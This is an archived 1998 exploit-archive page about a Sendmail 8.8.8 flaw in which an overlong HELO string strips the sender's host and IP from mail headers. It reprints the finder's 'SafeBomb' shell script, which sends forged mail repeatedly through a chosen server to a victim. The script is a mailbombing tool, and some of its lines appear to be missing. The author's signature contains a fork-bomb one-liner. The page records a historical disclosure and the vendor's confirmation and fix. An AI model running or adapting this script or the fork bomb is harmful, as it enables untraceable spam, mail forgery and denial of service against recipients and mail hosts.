Sendmail 8.8.8 HELO problem

Description:By specifying a very long hostname in the HELO command at the beginning of SMTP negotiation, you can cause your real hostname and IP to not be displayed in the header Received: field. This leaves potential for mischief by mail forgers and (unfortuantely) spammers.
Author:Michał Zalewski <>
Compromise:Send forged mail without your IP appearing in the message headers.
Vulnerable Systems:Those running Sendmail 8.8.8 and probably earlier.
Date:12 January 1998

Date: Mon, 12 Jan 1998 20:59:54 +0100
From: Michał Zalewski <>
Subject: Fw: Sendmail 8.8.8 (qmail?) HELO hole.

Maybe you want to know ;)

-----Original Message-----
From: Michał Zalewski <>
To: <>
Date: 10 stycznia 1998 12:28
Subject: Sendmail 8.8.8 (qmail?) HELO hole.

Here's a brief description of Sendmail (qmail) hole I found

When someone mailbombs you, or tries to send fakemail, spam, etc -
sendmail normally attachs sender's host name and it's address
to outgoing message:

>From Mon Jan  5 22:08:21 1998
Received: from spammer ( [])
          by (8.8.8/8.8.8) with SMTP id WAA00376
          for lcamtuf; Mon, 5 Jan 1998 22:07:54 +0100
Date: Mon, 5 Jan 1998 22:07:54 +0100
Message-Id: <3.14159665@pi>


That's perfect - now you know, who is responsible for that annoying
junk in your mailbox: "Received: from spammer (
[])". Nothing easier...
But I found a small hole, which allows user to hide it's personality,
and send mails anonymously. The only thing you should do is to
pass HELO string longer than approx. 1024 B - sender's location and
other very useful information will be cropped!!! Message
headers should become not interesting. Sometimes, sender
may become quite untraceable (but not always, if it's possible
to obtain logs from machine which has been used to sent):

>From Mon Jan  5 22:09:05 1998
Received: from xxxxxxxxxxxxxx... [a lot of 'x's] ...xxxx
Date: Mon, 5 Jan 1998 22:08:52 +0100
Message-Id: <3.14159665@pi>

MAILBOOM!!! Now guess who am I...

Here's a simple example of Sendmail's HELO hole usage. Note, this
script has been written ONLY to show how easy may be sending
fakemails, mailbombs, with cooperation of Sendmail ;) Script is
very slow and restricted in many ways, but explains the problem
well (note, some of non-Berkeley daemons are also affected,
probably Qmail?):


echo "SafeBomb 1.02b -- sendmail HELO hole usage example"
echo "Author: Michal Zalewski <>"

if [ "$4" = "" ]; then
  echo "USAGE: $0 msgfile address server sender"
  echo "  msgfile - file to send as a message body"
  echo "  address - address of lucky recipient"
  echo "  server  - outgoing smtp server w/sendmail"
  echo "  sender  - introduce yourself"
  echo "WARNING: For educational use ONLY. Mailbombing is illegal."
  echo "Think twice BEFORE you use this program in any way. Also,"
  echo "I've never said this program is 100% safe nor bug-free."
  sleep 1
  exit 0

if [ ! -f $1 ]; then
  echo "Message file not found."
  exit 0

echo -n "Preparing message..."
mkdir $TMPDIR &>/dev/null
chmod 700 $TMPDIR
echo "echo \"helo _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_\"" >$PLIK
echo "echo \"mail from: \\\"$4\\\"\"" >>$PLIK
echo "echo \"rcpt to: $2\"" >>$PLIK
echo "echo \"data\"" >>$PLIK
echo "cat <<__qniec__" >>$PLIK
cat $1 >>$PLIK
echo "__qniec__" >>$PLIK
echo "echo \".\"" >>$PLIK
echo "echo \"quit\"" >>$PLIK
echo "sleep $TIMEOUT" >>$PLIK
chmod +x $PLIK
echo "OK"

echo "Sending $1 (as $4) to $2 via $3 -- Ctrl+Z to abort."

while [ -f $1 ]; do
  $PLIK|telnet $3 25 &>/dev/null &
  let SENT=SENT+1
  echo -ne "Sent: $SENT\b\b\b\b\b\b\b\b\b\b\b\b\b"
  CONNECTED=`ps|grep -c "telnet $3"`
  if [ "$LIMIT" -le "$CONNECTED" ]; then
    while [ "$LIMIT" -le "$CONNECTED" ]; do
      sleep 1
  if [ "$SENT" -ge "$MAX" ]; then
    echo "It's just an example, sorry."
    exit 0
-- EOF --

Suggested fix: insert additional length limit into HELO/EHLO
parameter scanning routine OR disable AllowBogusHELO (but it
may cause serious troubles). I have no 8.8.8 sources at the
time, so execuse me if it's unclear.


From: Gregory Neil Shapiro <>

I was able to reproduce the header problem by lengthening the HELO string
in your script.  


This will be fixed in sendmail 8.9.

Michał Zalewski [tel 9690] | finger 4 PGP []
Iterować jest rzeczą ludzką, wykonywać rekursywnie - boską [P. Deustch]
=--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] ---------=

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: